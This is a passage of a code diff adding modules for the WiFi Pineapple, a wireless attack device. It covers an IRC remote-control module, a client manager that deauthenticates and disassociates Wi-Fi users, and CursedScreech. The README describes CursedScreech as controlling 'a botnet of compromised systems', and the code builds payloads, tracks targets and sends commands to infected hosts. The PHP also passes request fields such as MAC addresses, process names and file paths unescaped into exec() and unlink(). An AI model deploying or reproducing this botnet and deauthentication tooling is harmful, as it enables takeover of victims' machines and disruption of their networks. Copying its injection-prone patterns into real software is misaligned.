+                $scope.CommanderConfiguration = response.CommanderConfiguration;
+            }
+        });
+    });
+
+    $scope.saveConfiguration = (function() {
+        $api.request({
+            module: 'Commander',
+            action: 'saveConfiguration',
+            CommanderConfiguration: $scope.CommanderConfiguration
+        }, function(response) {
+            console.log(response);
+            if (response.success === true){
+                $scope.getConfiguration();
+            }
+        });
+    });
+
+    $scope.restoreDefaultConfiguration = (function() {
+        $api.request({
+            module: 'Commander',
+            action: 'restoreDefaultConfiguration'
+        }, function(response) {
+            if (response.success === true) {
+                $scope.getConfiguration();
+            }
+        });
+    });
+
+    $scope.getConfiguration();
+}]);

modules/src/Commander/module.html

@@ -0,0 +1,62 @@
+<div class="row">
+	<div class="col-md-12">
+		<div class="panel panel-default">
+			<div class="panel-heading">
+				<h3 class="panel-title">Commander
+					<button type="button" class="close pull-right" data-toggle="modal" data-target="#information" aria-label="Close"><span aria-hidden="true">i</span></button></h3></h3>
+				</div>
+			</div>
+		</div>
+		<div id="information" class="modal fade" role="dialog">
+			<div class="modal-dialog">
+				<div class="modal-content">
+					<div class="modal-header">
+						<button type="button" class="close" data-dismiss="modal">&times;</button>
+						<h4 class="modal-title">Information</h4>
+					</div>
+					<div class="modal-body">
+						<h3><center>Commander 1.0</center></h3>
+						<h5><center>Written by Foxtrot</center></h5>
+						<h5><center>This module allows you to control your WiFi Pineapple over IRC by acting as a client connecting to your specified server. You can then specify custom commands to execute by talking to it like it was a person.</center></h5>
+						<br/><br/>
+						<h5 class="text-danger"><center>Please use Responsibly!</center></h5>
+					</div>
+				</div>
+			</div>
+		</div>
+	</div>
+
+	<div class="row">
+		<div class="col-md-5" ng-controller="CommanderController">
+			<div class="panel panel-default">
+				<div class="panel-heading">
+					<h3 class="panel-title">Control</h3>
+				</div>
+				<div class="panel-body">
+					Status : <span class="text-success" ng-show="commanderRunning">Running</span> <span ng-hide="commanderRunning" class="text-danger">Not Running!</span>
+
+					<button class="btn btn-sm btn-primary pull-right" ng-click="startCommander()" ng-hide="commanderRunning">Start</button>
+					<button class="btn btn-sm btn-primary pull-right" ng-click="stopCommander()" ng-show="commanderRunning">Stop</button>
+				</div>
+			</div>
+		</div>
+
+		<div class="col-md-7" ng-controller="CommanderManageController">
+			<div class="panel panel-default">
+				<div class="panel-heading">
+					<h3 class="panel-title">Manage
+						<button type="button" ng-click="getConfiguration();" class="close pull-right"aria-label="Refresh"><span aria-hidden="true">&#8635;</span></button></h3>
+					</div>
+					<div class="panel-body">
+						<p>Edit configuration:</p>
+						<p>
+							<textarea class="form-control" rows="15" ng-model="CommanderConfiguration"></textarea>
+						</p>
+
+						<p class="well well-sm alert-success" ng-show="configSaved">Configuration Saved</p>
+						<button type="submit" class="btn btn-sm btn-primary" ng-click="saveConfiguration()">Save Configuration</button>
+						<button type="submit" class="btn btn-sm btn-warning" ng-click="restoreDefaultConfiguration()">Restore Defaults</button>
+					</div>
+				</div>
+			</div>
+		</div>

modules/src/Commander/module.info

@@ -0,0 +1,10 @@
+{
+    "author": "Foxtrot",
+    "description": "Control the Pineapple via IRC",
+    "devices": [
+        "nano",
+        "tetra"
+    ],
+    "title": "Commander",
+    "version": "2.1"
+}

modules/src/ConnectedClients/api/module.php

@@ -0,0 +1,78 @@
+<?php namespace pineapple;
+
+class ConnectedClients extends Module
+{
+	public function route()
+	{
+		switch ($this->request->action) {
+			case 'getVersionInfo':
+			$this->getVersionInfo();
+			break;
+			case 'getDHCPLeases':
+			$this->getDHCPLeases();
+			break;
+			case 'getBlacklist':
+			$this->getBlacklist();
+			break;
+			case 'getConnectedClients':
+			$this->getConnectedClients();
+			break;
+			case 'removeMacAddress':
+			$this->removeMacAddress();
+			break;
+			case 'addMacAddress':
+			$this->addMacAddress();
+			break;
+			case 'disassociateMac':
+			$this->disassociateMac();
+			break;
+			case 'deauthenticateMac':
+			$this->deauthenticateMac();
+			break;
+		}
+	}
+
+	protected function getVersionInfo() {
+		$moduleInfo = @json_decode(file_get_contents("/pineapple/modules/ConnectedClients/module.info"));
+		$this->response = array('title' => $moduleInfo->title, 'version' => $moduleInfo->version);
+	}
+
+	private function getDHCPLeases() {
+		exec("cat /tmp/dhcp.leases", $dhcpleases);
+		$this->response = array('dhcpleases' => $dhcpleases);		
+
+	}
+
+	private function getBlacklist() {
+		exec("pineapple karma list_macs", $mac_list);
+		$this->response = array('blacklist' => $mac_list);
+	}
+
+	private function getConnectedClients() {
+		exec("iwconfig 2>/dev/null | grep IEEE | awk '{print $1}'", $wlandev);
+		exec("iw dev $wlandev[0] station dump | grep Station | awk '{print $2}'", $wlan0clients);
+		exec("iw dev $wlandev[1] station dump | grep Station | awk '{print $2}'", $wlan01clients);
+		exec("iw dev $wlandev[2] station dump | grep Station | awk '{print $2}'", $wlan1clients);
+		$this->response = array('wlan0clients' => $wlan0clients, 'wlan01clients' => $wlan01clients, 'wlan1clients' => $wlan1clients, 'wlandev' => $wlandev);
+	}
+
+	private function removeMacAddress() {
+		exec('pineapple karma del_mac "'.$this->request->macAddress.'"', $removeMacResponse);
+		$this->response = array('removeMacResponse' => $removeMacResponse);
+	}
+
+	private function addMacAddress() {
+		exec('pineapple karma add_mac "'.$this->request->macAddress.'"', $addMacResponse);
+		$this->response = array('addMacResponse' => $addMacResponse);
+	}
+
+	private function disassociateMac() {
+		exec('hostapd_cli disassociate "'.$this->request->macAddress.'"', $disassociateResponse);
+		$this->response = array('disassociateResponse' => $disassociateResponse);
+	}
+
+	private function deauthenticateMac() {
+		exec('hostapd_cli deauthenticate "'.$this->request->macAddress.'"', $deauthenticateResponse);
+		$this->response = array('deauthSuccess' => 'Successful', 'deauthenticateResponse' => $deauthenticateResponse);
+	}
+}

modules/src/ConnectedClients/js/module.js

@@ -0,0 +1,114 @@
+registerController('ConnectedClientsController', ['$api', '$scope', function($api, $scope) {
+	$scope.title = "Loading...";
+	$scope.version = "Loading...";
+	$scope.clientslength = 0;
+	$scope.wlan0clients = [];
+	$scope.wlan01clients = [];
+	$scope.wlan1clients = [];
+	$scope.wlandev = [];
+	$scope.dhcplength = 0;
+	$scope.dhcpleases = [];
+	$scope.blacklistlength = 0;
+	$scope.blacklist = [];
+
+	// this function gets info from the module.info file
+	$scope.getVersionInfo = (function() {
+		$api.request({
+			module: 'ConnectedClients',
+			action: 'getVersionInfo'
+		}, function(response) {
+			$scope.title = response.title;
+			$scope.version = response.version;
+		});
+	});
+
+	// this function gets the connected clients information and fills in the panel
+	$scope.getConnectedClients = (function() {
+		$api.request({
+			module: 'ConnectedClients',
+			action: 'getConnectedClients'
+		}, function(response) {
+			$scope.clientslength = response.wlan0clients.length + response.wlan01clients.length + response.wlan1clients.length;
+			$scope.wlan0clients = response.wlan0clients;
+			$scope.wlan01clients = response.wlan01clients;
+			$scope.wlan1clients = response.wlan1clients;
+			$scope.wlandev = response.wlandev;
+		});
+	});
+
+	// this function adds a mac address to the blacklist
+	$scope.addMacAddress = (function(macAddress) {
+		$api.request({
+			module: 'ConnectedClients',
+			action: 'addMacAddress',
+			macAddress: macAddress
+		}, function(response) {
+			$scope.getBlacklist();
+		});
+	});
+
+	// this function gets the DHCP leases from the file system and fills in the panel
+	$scope.getDHCPLeases = (function() {
+		$api.request({
+			module: 'ConnectedClients',
+			action: 'getDHCPLeases'
+		}, function(response) {
+			$scope.dhcplength = response.dhcpleases.length;
+			$dhcp = response.dhcpleases;
+			for (var i = $scope.dhcplength - 1; i >= 0; i--) {
+				$dhcp[i] = $dhcp[i].split(' ');
+			}
+			$scope.dhcpleases = $dhcp;
+		});
+	});
+
+	// this function removes a MAC address from the blacklist
+	$scope.removeMacAddress = (function(macAddress) {
+		$api.request({
+			module: 'ConnectedClients',
+			action: 'removeMacAddress',
+			macAddress: macAddress
+		}, function(response) {
+			$scope.getBlacklist();
+		});
+	});
+
+	// this function retrieves the blacklist and fills it in on the panel
+	$scope.getBlacklist = (function() {
+		$api.request({
+			module: 'ConnectedClients',
+			action: 'getBlacklist'
+		}, function(response) {
+			$scope.blacklistlength = response.blacklist.length;
+			$scope.blacklist = response.blacklist;
+		});
+	});
+
+	// this function disassociates a MAC address
+	$scope.disassociateMac = (function(macAddress) {
+		$api.request({
+			module: 'ConnectedClients',
+			action: 'disassociateMac',
+			macAddress: macAddress
+		}, function(response) {
+			$scope.getConnectedClients();
+		});
+	});
+
+	// this function deauthenticates a MAC address
+	$scope.deauthenticateMac = (function(macAddress) {
+		$api.request({
+			module: 'ConnectedClients',
+			action: 'deauthenticateMac',
+			macAddress: macAddress
+		}, function(response) {
+			$scope.getConnectedClients();
+		});
+	});
+
+	// initialize the panels
+	$scope.getVersionInfo();
+	$scope.getBlacklist();
+	$scope.getConnectedClients();
+	$scope.getDHCPLeases();
+}]);

modules/src/ConnectedClients/module.html

@@ -0,0 +1,59 @@
+<div ng-controller="ConnectedClientsController">
+	<div class="panel panel-default">
+		<div class="panel-heading">
+			<h4 class="panel-title pull-left">{{title}}</h4>
+			<span class="pull-right">v{{version}}</span>
+			<div class="clearfix"></div>
+		</div>
+	</div>
+	<div class="panel panel-default">
+		<div class="panel-heading pointer" data-toggle="collapse" data-target="#ClientsContainer">
+			<h4 class="panel-title pull-left">Connected Clients</h4>
+			<span class="pull-right">Count: {{ clientslength }}</span>
+			<div class="clearfix"></div>
+		</div>
+		<div id="ClientsContainer" class="panel-collapse collapse in">
+			<h3 class="text-center">{{ wlandev[0] }}</h3>
+			<table class="table table-striped table-bordered text-center">
+				<tr><th class="text-center">Mac Address</th><th class="text-center">Disassociate</th><th class="text-center">Deauthenticate</th><th class="text-center">Blacklist</th></tr>
+				<tr ng-repeat="wlan0 in wlan0clients"><td>{{ wlan0 }}</td><td><button type="button" class="btn btn-danger" ng-click="disassociateMac(wlan0)">Disassociate</button></td><td><button type="button" class="btn btn-danger" ng-click="deauthenticateMac(wlan0)">Deauthenticate</button></td><td><button type="button" class="btn btn-danger" ng-click="addMacAddress(wlan0)">Blacklist</button></td></tr>
+			</table>
+			<h3 class="text-center">{{ wlandev[1] }}</h3>
+			<table class="table table-striped table-bordered text-center">
+				<tr><th class="text-center">Mac Address</th><th class="text-center">Disassociate</th><th class="text-center">Deauthenticate</th><th class="text-center">Blacklist</th></tr>
+				<tr ng-repeat="wlan01 in wlan01clients"><td>{{ wlan01 }}</td><td><button type="button" class="btn btn-danger" ng-click="disassociateMac(wlan01)">Disassociate</button></td><td><button type="button" class="btn btn-danger" ng-click="deauthenticateMac(wlan01)">Deauthenticate</button></td><td><button type="button" class="btn btn-danger" ng-click="addMacAddress(wlan01)">Blacklist</button></td></tr>
+			</table>
+			<h3 class="text-center">{{ wlandev[2] }}</h3>
+			<table class="table table-striped table-bordered text-center">
+				<tr><th class="text-center">Mac Address</th><th class="text-center">Disassociate</th><th class="text-center">Deauthenticate</th><th class="text-center">Blacklist</th></tr>
+				<tr ng-repeat="wlan1 in wlan1clients"><td>{{ wlan1 }}</td><td><button type="button" class="btn btn-danger" ng-click="disassociateMac(wlan1)">Disassociate</button></td><td><button type="button" class="btn btn-danger" ng-click="deauthenticateMac(wlan1)">Deauthenticate</button></td><td><button type="button" class="btn btn-danger" ng-click="addMacAddress(wlan1)">Blacklist</button></td></tr>
+			</table>
+		</div>
+	</div>
+	<div class="panel panel-default">
+		<div class="panel-heading pointer" data-toggle="collapse" data-target="#DHCPContainer">
+			<h4 class="panel-title pull-left">DHCP Leases</h4>
+			<span class="pull-right">Count: {{ dhcplength }}</span>
+			<div class="clearfix"></div>
+		</div>
+		<div id="DHCPContainer" class="panel-collapse collapse in">
+			<table class="table table-striped table-bordered text-center">
+				<tr><th class="text-center">Hostname</th><th class="text-center">IP Address</th><th class="text-center">MAC Address</th><th class="text-center">Blacklist</th></tr>
+				<tr ng-repeat="dhcplease in dhcpleases"><td>{{ dhcplease[3] }}</td><td>{{ dhcplease[2] }}</td><td>{{ dhcplease[1] }}</td><td><button type="button" class="btn btn-danger" ng-click="addMacAddress(dhcplease[1])">Blacklist</button></td></tr>
+			</table>
+		</div>
+	</div>
+	<div class="panel panel-default">
+		<div class="panel-heading pointer" data-toggle="collapse" data-target="#BlacklistContainer">
+			<h4 class="panel-title pull-left">Blacklist</h4>
+			<span class="pull-right">Count: {{ blacklistlength }}</span>
+			<div class="clearfix"></div>
+		</div>
+		<div id="BlacklistContainer" class="panel-collapse collapse in">
+			<table class="table table-striped table-bordered text-center">
+				<tr><th class="text-center">MAC Address</th><th class="text-center">Remove</th></tr>
+				<tr ng-repeat="mac in blacklist track by $index"><td>{{ mac }}</td><td><button type="button" class="btn btn-danger" ng-click="removeMacAddress(mac)">Remove</button></td></tr>
+			</table>
+		</div>
+	</div>
+</div>

modules/src/ConnectedClients/module.info

@@ -0,0 +1,10 @@
+{
+    "author": "r3dfish",
+    "description": "Connected Clients is an infusion for the Wifi Pineapple that gives information about connected clients",
+    "devices": [
+        "nano",
+        "tetra"
+    ],
+    "title": "ConnectedClients",
+    "version": "1.4"
+}

modules/src/CursedScreech/README.md

@@ -0,0 +1,66 @@
+# CursedScreech
+
+A mass communicator module for the WiFi Pineapple that utilizes TLS to control a botnet of compromised systems.  Included is a C# API and Python API (with documentation) to write payloads that can communicate with CursedScreech and PortalAuth.
+
+
+# APIs
+I recommend using C# over Python to build your payload.  Both APIs are really simple to use but using C# will allow you to create a self-contained executable along with required keys/certificates.  Writing your payload in Python will require you to freeze your code and it can be difficult, if not impossible, to include all required files in a single executable.  If you can't make a single executable you will have to find a way to move the whole dist directory to the target machine.
+
+### C# API Example
+```
+using System;
+using System.Drawing;
+using System.Windows.Forms;
+using PineappleModules;
+
+namespace Payload
+{
+	public partial class Form1 : Form {
+    
+		PA_Authorization pauth = new PA_Authorization();
+	
+		public Form1() {
+			InitializeComponent();
+	
+			CursedScreech cs = new CursedScreech();
+			cs.startMulticaster("231.253.78.29", 19578);
+			cs.setRemoteCertificateSerial("EF-BE-AD-DE");
+			cs.setRemoteCertificateHash("1234567890ABCDEF");
+			cs.startSecureServerThread("Payload.Payload.pfx", "#$My$ecuR3P4ssw*rd&");
+		}
+		private void Form1_FormClosing(object sender, FormClosingEventArgs e) {
+			e.Cancel = true;
+			this.Hide();
+		}
+		private void accessKeyButton_Click(object sender, EventArgs e) {
+				
+			// Request an access key from the Pineapple
+			string key = pauth.getAccessKey();
+	
+			// Check if a key was returned
+			string msg;
+			if (key.Length > 0) {
+				msg = "Your access key is unique to you so DO NOT give it away!\n\nAccess Key: " + key;
+			}
+			else {
+				msg = "Failed to retrieve an access key from the server.  Please try again later.";
+			}
+			
+			// Display message to the user
+			MessageBox.Show(msg);
+		}
+	}
+}
+
+```
+
+
+### Python API Example
+```
+from PineappleModules import CursedScreech
+
+cs = CursedScreech("Network Client")
+cs.startMulticaster("231.253.78.29", 19578)
+cs.setRemoteCertificateSerial("ABCDEF1234567890")
+cs.startSecureServerThread("payload.pem", "payload.cer", "cursedscreech.cer")
+```

modules/src/CursedScreech/api/module.php

@@ -0,0 +1,654 @@
+<?php
+
+namespace pineapple;
+
+// Root level includes
+define('__INCLUDES__', "/pineapple/modules/CursedScreech/includes/");
+
+// Define to hook into Papers' SSL store
+define('__SSLSTORE__', "/pineapple/modules/Papers/includes/ssl/");
+
+// Main directory defines
+define('__FOREST__', __INCLUDES__ . 'forest/');
+define('__SCRIPTS__', __INCLUDES__ . "scripts/");
+define('__HELPFILES__', __INCLUDES__ . "help/");
+define('__CHANGELOGS__', __INCLUDES__ . "changelog/");
+define('__LOGS__', __INCLUDES__ . "errorlogs/");
+define('__TARGETLOGS__', __FOREST__ . "targetlogs/");
+define('__PAYLOADS__', __INCLUDES__ . "payloads/");
+
+// API defines
+define('__API_CS__', __INCLUDES__ . "api/cs/");
+define('__API_PY__', __INCLUDES__ . "api/python/");
+define('__API_DL__', __INCLUDES__ . "api/downloads/");
+
+// File location defines
+define('__ACTIVITYLOG__', __FOREST__ . 'activity.log');
+define('__SETTINGS__', __FOREST__ . 'settings');
+define('__TARGETS__', __FOREST__ . "targets.log");
+define('__COMMANDLOG__', __FOREST__ . "cmd.log");
+define('__EZCMDS__', __FOREST__ . "ezcmds");
+
+
+/*
+	Move the uploaded file to the payloads directory
+*/
+if (!empty($_FILES)) {
+	$response = [];
+	foreach ($_FILES as $file) {
+		$tempPath = $file[ 'tmp_name' ];
+		$name = pathinfo($file['name'], PATHINFO_FILENAME);
+		$type = pathinfo($file['name'], PATHINFO_EXTENSION);
+		
+		// Ensure the upload directory exists
+		if (!file_exists(__PAYLOADS__)) {
+			if (!mkdir(__PAYLOADS__, 0755, true)) {
+				$response[$name]['success'] = "Failed";
+				$response[$name]['message'] = "Failed to create payloads directory";
+				echo json_encode($response);
+				die();
+			}
+		}
+		
+		$uploadPath = __PAYLOADS__ . $name . "." . $type;
+		$res = move_uploaded_file($tempPath, $uploadPath);
+		
+		if ($res) {
+			$response[$name]['success'] = "Success";
+		} else {
+			$response[$name]['success'] = "Failed";
+			$response[$name]['message'] = "Failed to upload payload '" . $name . "." . $type . "'";
+		}
+	}
+	echo json_encode($response);
+	die();
+}
+
+class CursedScreech extends Module {
+	public function route() {
+		switch ($this->request->action) {
+			case 'init':
+				$this->init();
+				break;
+			case 'depends':
+				$this->depends($this->request->task);
+				break;
+			case 'loadSettings':
+				$this->loadSettings();
+				break;
+			case 'updateSettings':
+				$this->updateSettings($this->request->settings);
+				break;
+			case 'readLog':
+				$this->retrieveLog($this->request->logName, $this->request->type);
+				break;
+			case 'getLogs':
+				$this->getLogs($this->request->type);
+				break;
+			case 'clearLog':
+				$this->clearLog($this->request->logName, $this->request->type);
+				break;
+			case 'deleteLog':
+				$this->deleteLog($this->request->logName, $this->request->type);
+				break;
+			case 'startProc':
+				$this->startProc($this->request->procName);
+				break;
+			case 'procStatus':
+				$this->procStatus($this->request->procName);
+				break;
+			case 'stopProc':
+				$this->stopProc($this->request->procName);
+				break;
+			case 'loadCertificates':
+				if (is_dir(__SSLSTORE__)) {
+					$this->loadCertificates();
+				} else {
+					$this->respond(false, "Papers is not installed. Please enter a path to your keys manually.");
+				}
+				break;
+			case 'loadTargets':
+				$this->loadTargets();
+				break;
+			case 'deleteTarget':
+				$this->deleteTarget($this->request->target);
+				break;
+			case 'sendCommand':
+				$this->sendCommand($this->request->command, $this->request->targets);
+				break;
+			case 'downloadLog':
+				$this->downloadLog($this->request->logName, $this->request->logType);
+				break;
+			case 'loadEZCmds':
+				$this->loadEZCmds();
+				break;
+			case 'saveEZCmds':
+				$this->saveEZCmds($this->request->ezcmds);
+				break;
+			case 'genPayload':
+				$this->genPayload($this->request->type);
+				break;
+			case 'clearDownloads':
+				$this->clearDownloads();
+				break;
+			case 'loadAvailableInterfaces':
+				$this->loadAvailableInterfaces();
+				break;
+			case 'getPayloads':
+				$this->getPayloads();
+				break;
+			case 'deletePayload':
+				$this->deletePayload($this->request->filePath);
+				break;
+			case 'cfgUploadLimit':
+				$this->cfgUploadLimit();
+				break;
+		}
+	}
+	
+	/* ============================ */
+	/*        INIT FUNCTIONS        */
+	/* ============================ */
+	
+	private function init() {
+		if (!file_exists(__LOGS__)) {
+			if (!mkdir(__LOGS__, 0755, true)) {
+				$this->respond(false, "Failed to create logs directory");
+				return false;
+			}
+		}
+		
+		if (!file_exists(__API_DL__)) {
+			if (!mkdir(__API_DL__, 0755, true)) {
+				$this->logError("Failed init", "Failed to initialize because the API download directory structure could not be created.");
+				$this->respond(false);
+				return false;
+			}
+		}
+		
+		if (!file_exists(__TARGETLOGS__)) {
+			if (!mkdir(__TARGETLOGS__, 0755, true)) {
+				$this->logError("Failed init", "Failed to initialize because the targetlogs directory at '" . __TARGETLOGS__ . "' could not be created.");
+				$this->respond(false);
+				return false;
+			}
+		}
+	}
+	
+	/* ============================ */
+	/*      DEPENDS FUNCTIONS       */
+	/* ============================ */
+	
+	private function depends($action) {
+		$retData = array();
+		
+		if ($action == "install") {
+			exec(__SCRIPTS__ . "installDepends.sh", $retData);
+			if (implode(" ", $retData) == "Complete") {
+				$this->respond(true);
+				return true;
+			} else {
+				$this->respond(false);
+				return false;
+			}
+		} else if ($action == "remove") {
+			exec(__SCRIPTS__ . "removeDepends.sh");
+			$this->respond(true);
+			return true;
+		} else if ($action == "check") {
+			exec(__SCRIPTS__ . "checkDepends.sh", $retData);
+			if (implode(" ", $retData) == "Installed") {
+				$this->respond(true);
+				return true;
+			} else {
+				$this->respond(false);
+				return false;
+			}
+		}
+	}
+	
+	/* ============================ */
+	/*      SETTINGS FUNCTIONS      */
+	/* ============================ */
+	
+	private function loadSettings(){
+		$configs = array();
+		$config_file = fopen(__SETTINGS__, "r");
+		if ($config_file) {
+			while (($line = fgets($config_file)) !== false) {
+				$item = explode("=", $line);
+				$key = $item[0]; $val = trim($item[1]);
+				$configs[$key] = $val;
+			}
+		}
+		fclose($config_file);
+		$this->respond(true, null, $configs);
+		return $configs;
+	}
+	
+	private function updateSettings($settings) {
+		// Load the current settings from file
+		$configs = $this->loadSettings();
+		
+		// Update the current list.  We do it this way so only the requested
+		// settings are updated. Probably not necessary but whatevs.
+		foreach ($settings as $k => $v) {
+			$configs["$k"] = $v;
+		}
+
+		// Get the serial number of the target's public cert
+		$configs['client_serial'] = exec(__SCRIPTS__ . "getCertSerial.sh " . $configs['target_key'] . ".cer");
+		$configs['kuro_serial'] = exec(__SCRIPTS__ . "getCertSerial.sh " . $configs['kuro_key'] . ".cer");
+		
+		// Get the IP address of the selected listening interface
+		$configs['iface_ip'] = exec(__SCRIPTS__ . "getInterfaceIP.sh " . $configs['iface_name']);
+		
+		// Push the updated settings back out to the file
+		$config_file = fopen(__SETTINGS__, "w");
+		foreach ($configs as $k => $v) {
+			fwrite($config_file, $k . "=" . $v . "\n");
+		}
+		fclose($config_file);
+		
+		$this->respond(true);
+	}
+	
+	/* ============================ */
+	/*       FOREST FUNCTIONS       */
+	/* ============================ */
+	
+	private function startProc($procName) {
+		if ($procName == "kuro.py") {
+			file_put_contents(__ACTIVITYLOG__, "[+] Starting Kuro...\n", FILE_APPEND);
+		}
+		$cmd = "python " . __FOREST__ . $procName . " > /dev/null 2>&1 &";
+		exec($cmd);
+		
+		// Check if the process is running and return it's PID
+		if (($pid = $this->getPID($procName)) != "") {
+			$this->respond(true, null, $pid);
+			return $pid;
+		} else {
+			$this->logError("Failed_Process", "The following command failed to execute:<br /><br />" . $cmd);
+			$this->respond(false);
+			return false;
+		}
+	}
+	
+	private function procStatus($procName) {
+		if (($status = $this->getPID($procName)) != "") {
+			$this->respond(true, null, $status);
+			return true;
+		}
+		$this->respond(false);
+		return false;
+	}
+	
+	private function stopProc($procName) {
+		// Check if the process is running, if so grab it's PID
+		if (($pid = $this->getPID($procName)) == "") {
+			$this->respond(true);
+			return true;
+		}
+		
+		// Kuro requires a special bullet
+		if ($procName == "kuro.py") {
+			file_put_contents(__ACTIVITYLOG__, "[!] Stopping Kuro...\n", FILE_APPEND);
+			exec("echo 'killyour:self' >> " . __COMMANDLOG__);
+		} else {
+			// Kill the process
+			exec("kill " . $pid);
+		}
+		
+		// Check one more time if it's still running
+		if (($pid = $this->getPID($procName)) == "") {
+			$this->respond(true);
+			return true;
+		}
+		$this->respond(false);
+		return false;
+	}
+	
+	private function getPID($procName) {
+		$data = array();
+		exec("pgrep -lf " . $procName, $data);
+		$output = explode(" ", $data[0]);
+		if (strpos($output[1], "python") !== False) {
+			return $output[0];
+		}
+		return false;
+	}
+	
+	private function loadTargets() {
+		$targets = array();
+		$fh = fopen(__TARGETS__, "r");
+		if ($fh) {
+			while (($line = fgets($fh)) !== False) {
+				array_push($targets, rtrim($line, "\n"));
+			}
+		} else {
+			$this->respond(false, "Failed to open " . __TARGETS__);
+			return false;
+		}
+		fclose($fh);
+		$this->respond(true, null, $targets);
+		return $targets;
+	}
+	
+	private function deleteTarget($target) {
+		$targetFile = explode("\n", file_get_contents(__TARGETS__));
+		$key = array_search($target, $targetFile, true);
+		if ($key !== False) {
+			unset($targetFile[$key]);
+		}
+		
+		$fh = fopen(__TARGETS__, "w");
+		fwrite($fh, implode("\n", $targetFile));
+		fclose($fh);
+		
+		$this->respond(true);
+		return true;
+	}
+	
+	private function sendCommand($cmd, $targets) {
+		if (count($targets) == 0) {
+			$this->respond(false);
+			return;
+		}
+		
+		$output = "";
+		foreach ($targets as $target) {
+			$output .= $cmd . ":" . $target . "\n";
+		}
+		$fh = fopen(__COMMANDLOG__, "w");
+		if ($fh) {
+			fwrite($fh, $output);
+			fclose($fh);
+			$this->respond(true);
+			return true;
+		} else {
+			$this->respond(false);
+			return false;
+		}
+	}
+	
+	private function downloadLog($logName, $type) {
+		$dir = ($type == "forest") ? __FOREST__ : (($type == "targets") ? __TARGETLOGS__ : "");
+		if (file_exists($dir . $logName)) {
+			$this->respond(true, null, $this->downloadFile($dir . $logName));
+			return true;
+		}
+		$this->respond(false);
+		return false;
+	}
+	
+	private function genPayload($type) {
+		if ($type == "python") {
+			$dir = __API_PY__;
+			$payload = "payload.py";
+			$api = "PineappleModules.py";
+			$zip = "Python_Payload.zip";
+		} else if ($type == "cs") {
+			$dir = __API_CS__;
+			$payload = "payload.cs";
+			$api = "PineappleModules.cs";
+			$zip = "CS_Payload.zip";
+		} else if ($type == "cs_auth") {
+			$dir = __API_CS__;
+			$payload = "payloadAuth.cs";
+			$api = "PineappleModules.cs";
+			$zip = "CS_Auth_Payload.zip";
+		} else {
+			return null;
+		}
+		$template = "template/" . $payload;
+		
+		// Get the configs so we can push them to the payload template
+		$configs = $this->loadSettings();
+		
+		// Copy the contents of the payload template and add our configs
+		$contents = file_get_contents($dir . $template);
+		$contents = str_replace("IPAddress", $configs['mcast_group'], $contents);
+		$contents = str_replace("mcastport", $configs['mcast_port'], $contents);
+		$contents = str_replace("hbinterval", $configs['hb_interval'], $contents);
+		
+		// The format of the serial number in the C# payload differs from that in the
+		// Python payload.  Therefore, we need this check here.
+		if ($type == "python") {
+			$contents = str_replace("serial", $configs['kuro_serial'], $contents);
+			$contents = str_replace("publicKey", end(explode("/", $configs['target_key'])) . ".cer", $contents);
+			$contents = str_replace("kuroKey", end(explode("/", $configs['kuro_key'])) . ".cer", $contents);
+			$contents = str_replace("privateKey", end(explode("/", $configs['target_key'])) . ".pem", $contents);
+		} else {
+			$contents = str_replace("serial", exec(__SCRIPTS__ . "bigToLittleEndian.sh " . $configs['kuro_serial']), $contents);
+			
+			// This part seems confusing but the fingerprint is returned from the script in the following format:
+			// Fingerprint=AB:CD:EF:12:34:56:78:90
+			// And the C# payload requires it to be in the following format: ABCDEF1234567890
+			// Therefore we explode the returned data into an array, keep only the second element, then run a str_replace on all ':' characters
+			
+			$ret = exec(__SCRIPTS__ . "getFingerprint.sh " . $configs['kuro_key'] . ".cer");
+			$fingerprint = implode("", explode(":", explode("=", $ret)[1]));
+			$contents = str_replace("fingerprint", $fingerprint, $contents);
+			$contents = str_replace("privateKey", "Payload." . end(explode("/", $configs['target_key'])) . ".pfx", $contents);
+		}
+		
+		// Write the changes to the payload file
+		$fh = fopen($dir . $payload, "w");
+		fwrite($fh, $contents);
+		fclose($fh);
+		
+		// Archive the directory
+		$files = implode(" ", array($payload, $api, "Documentation.pdf"));
+		
+		// Command: ./packPayload.sh $dir -o $zip -f $files
+		exec(__SCRIPTS__ . "packPayload.sh " . $dir . " -o " . $zip . " -f \"" . $files . "\"");
+		
+		// Check if a file exists in the downloads directory
+		if (count(scandir(__API_DL__)) > 2) {
+			$this->respond(true, null, $this->downloadFile(__API_DL__ . $zip));
+			return true;
+		}
+		$this->respond(false);
+		return false;
+	}
+	
+	private function clearDownloads() {
+		$files = scandir(__API_DL__);
+		$success = true;
+		foreach ($files as $file) {
+			if (substr($file, 0, 1) == ".") {continue;}
+			if (!unlink(__API_DL__ . $file)) {
+				$success = false;
+			}
+		}
+		$this->respond($success);
+		return $success;
+	}
+	
+	private function loadAvailableInterfaces() {
+		$data = array();
+		exec(__SCRIPTS__ . "getListeningInterfaces.sh", $data);
+		if ($data == NULL) {
+			$this->logError("Load_Interfaces_Error", "Failed to load available interfaces for 'Listening Interface' dropdown.  Either the getListneingInterfaces.sh script failed or none of your interfaces have an IP address associated with them.");
+			$this->respond(false);
+		}
+		$this->respond(true, null, $data);
+	}
+	
+	//=========================//
+	//    PAYLOAD FUNCTIONS    //
+	//=========================//
+	
+	private function getPayloads() {
+		$files = [];
+		
+		foreach (scandir(__PAYLOADS__) as $file) {
+			if (substr($file, 0, 1) == ".") {continue;}
+			$files[$file] = __PAYLOADS__;
+		}
+		$this->respond(true, null, $files);
+		return $files;
+	}
+	
+	private function deletePayload($filePath) {
+		if (!unlink($filePath)) {
+			$this->logError("Delete Payload", "Failed to delete payload at path " . $filePath);
+			$this->respond(false);
+			return false;
+		}
+		$this->respond(true);
+		return true;
+	}
+	
+	private function cfgUploadLimit() {
+		$data = array();
+		$res = exec("python " . __SCRIPTS__ . "cfgUploadLimit.py > /dev/null 2>&1 &", $data);
+		if ($res != "") {
+			$this->logError("cfg_upload_limit_error", $data);
+			$this->respond(false);
+			return false;
+		}
+		$this->respond(true);
+		return true;
+	}
+	
+	/* ============================ */
+	/*        EZ CMD FUNCTIONS      */
+	/* ============================ */
+	
+	private function loadEZCmds() {
+		$contents = explode("\n", file_get_contents(__EZCMDS__));
+		$cmdDict = array();
+		foreach ($contents as $line) {
+			$cmd = explode(":", $line, 2);
+			$name = $cmd[0]; $action = $cmd[1];
+			$cmdDict[$name] = $action;
+		}
+		$this->respond(true, null, $cmdDict);
+		return $cmdDict;
+	}
+	
+	private function saveEZCmds($cmds) {
+		$fh = fopen(__EZCMDS__, "w");
+		if (!$fh) {
+			$this->respond(false);
+			return false;
+		}
+		foreach ($cmds as $k => $v) {
